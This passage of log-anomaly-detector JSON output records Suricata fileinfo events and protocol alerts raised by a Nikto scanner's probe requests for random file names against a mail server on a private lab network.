"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.274771, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46886, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1119818217040458, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80", "/parser/model/time": 1583349514.276675, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46888, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.chl+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.276861, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":287028353316318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46888, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":287028353316318,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 287028353316318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80", "/parser/model/time": 1583349514.27886, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46890, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.279049, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1745783930633893,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46890, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1745783930633893,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1745783930633893, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] 